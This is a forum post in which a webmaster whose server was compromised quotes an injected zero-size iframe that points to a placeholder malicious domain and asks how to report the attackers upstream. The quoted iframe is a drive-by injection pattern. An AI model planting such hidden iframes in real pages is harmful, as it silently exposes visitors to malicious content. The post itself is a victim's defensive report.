Forum Moderators: open
On various web page files on the server, the injected iframe looks like this:
<iframe src="http://DUMMYMALICIOUSDOMAIN/in.cgi?2" width="0" height="0" frameborder="0"></iframe>
I would gladly "name and shame" by supplying the actual values of DUMMYMALICIOUSDOMAIN I have seen - if permitted in the forum. I have seen several. For now, assume they are typos of the legitimate domain "global-analytics" and so on. BTW, all those malicious domain names I've seen were registered by the same domain name registrar.
The last part of the URL "in.cgi?2" is always the same. If you are familiar with this exploit, is it known exactly what this is really doing... has it's action been specifically identified?
Meanwhile.... who do I tell?
If I put DUMMYMALICIOUSDOMAIN in to Domain Tools, I find the domain name registrar is the same. I notify them my site has been hacked and give the domain name in the URL in the iframe injection. They don't seem to want to take any action. "Notify privacyprotect.org," they say.
As to notifying the host server....
no valid abuse address ... just contact@privacyprotect.org
no valid postal address ... All Postal Mails Rejected, visit Privacyprotect.org
I don't want to notify the malicious people about abuse they already know good and well they are up to. Are they running their own servers? How can I go upstream to a legitimate authority I can trust and that can AND WILL take action ?
On the other hand, does "Domain Status: Registered And No Website" mean someone has already taken action? But if that is not the case yet, what can I do to curtail the #*$!s' global activity?
[stopbadware.org...]
[webmasterworld.com...]
The Internet Storm Center has a history of checking these things, writing up diaries about it if relevant and notifying the right people to take action.
